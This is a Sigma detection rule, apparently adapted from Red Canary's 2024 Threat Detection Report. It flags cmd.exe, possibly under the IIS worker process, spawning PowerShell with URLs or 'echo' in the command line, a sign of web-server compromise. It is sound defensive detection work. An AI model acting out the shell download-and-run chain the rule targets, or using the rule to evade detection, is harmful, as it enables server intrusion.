Unusual or Suspicious Process Ancestry - Command Shell

 1title: Unusual or Suspicious Process Ancestry - Command Shell
 2id: 64d04088-5ed5-4125-9219-4bbedec13e9f
 3status: experimental
 4description: |
 5    We have a lot of detection analytics that seek out suspicious or unusual process 
 6    lineage spawning or spawning from cmd.exe. Many of them don’t often generate confirmed 
 7    threat detections but can occasionally raise the flag on important threats, like 
 8    Exchange compromises. One semi-common pattern in our library of analytics is suspicious 
 9    process interactions between the Windows IIS worker process (w3wp.exe) and the command 
10    shell. The following amalgamation of analytics might help you detect a diverse array of 
11    malicious activity related to web server compromises. Part of the RedCanary 2024 Threat 
12    Detection Report.    
13references:
14    - https://redcanary.com/threat-detection-report/techniques/windows-command-shell/
15author: RedCanary, Sigma formatting by Micah Babinski
16date: 2024/03/21
17tags:
18    - attack.execution
19    - attack.t1059
20    - attack.t1059.003
21logsource:
22    category: process_creation
23    product: windows
24detection:
25    selection:
26        # note: the 'GrantParentImage' field is not a legit field in a Sigma rule, as it is based
27        # on sysmon. However, using some log sources like Microsoft Defender for Endpoint you can 
28        # filter for InitiatingProcessParentFileName == "w3wp.exe" to achieve this type of query.
29        # GrantParentImage|endswith: '\w3wp.exe'
30        ParentImage|endswith: '\cmd.exe'
31        ParentCommandLine|contains:
32            - 'http://'
33            - 'https://'
34            - 'echo'
35        Image|endswith: '\powershell.exe'
36    condition: selection
37falsepositives:
38    - Unknown
39level: low```